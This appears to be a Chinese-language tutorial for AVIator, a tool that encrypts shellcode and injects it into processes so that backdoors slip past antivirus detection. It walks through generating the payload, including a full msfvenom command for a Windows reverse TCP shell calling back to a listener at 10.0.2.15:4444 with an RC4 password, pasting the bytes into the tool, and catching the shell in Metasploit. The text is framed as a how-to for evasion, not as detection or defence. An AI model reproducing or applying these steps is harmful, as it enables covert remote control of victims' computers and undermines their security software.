AVIator -- Bypass AV tool

前提概要

項目地址：https://github.com/Ch0pin/AVIator

AV：全名爲AntiVirus，意指爲防病毒軟件

AVIator是一個後門生成器實用程序，它使用加密和注入技術來繞過AV檢測。進一步來講：

• 它使用AES加密來加密給定的shellcode
• 生成包含加密有效負載的可執行文件
• 使用各類注入技術將shellcode解密並注入目標系統

1. 便攜式可執行注入，包括將惡意代碼直接寫入進程（沒有磁盤上的文件），而後使用其餘代碼或經過建立遠程線程調用執行。注入代碼的位移引入了從新映射內存引用的功能的附加要求。這種方法的變化，例如反射DLL注入（將自映射DLL寫入進程）和內存模塊（寫入進程時映射DLL）克服了地址重定位問題。

2. 線程執行劫持涉及將惡意代碼或DLL的路徑注入進程的線程。與Process Hollowing相似，必須首先暫停該線程。

 工具界面：

注入功能：

 

利用過程

工具編譯是由三部分組成

1. 包含用於加密shellcode的加密密鑰的文本
2. 包含用於AES加密的IV的文本
3. 包含shellcode的文本

其中shellcode部分是利用csharp組成的字節碼

利用msf生成payload：

msfvenom -p windows/x64/shell/reverse_tcp_rc4 LHOST=10.0.2.15 LPORT=4444 EXITFUNC=thread RC4PASSWORD=S3cr3TP4ssw0rd -f csharp

將生成的字節碼copy放到工具當中

而後按照以下步驟生成

隨後在MSF中監聽

其中RC4PASSWORD的值是以前msfvenom中設置的密碼

直接運行，並在msf接受反彈回來的shell

當explorer下的cmd.exe進程結束的時候，explorer父進程也將終結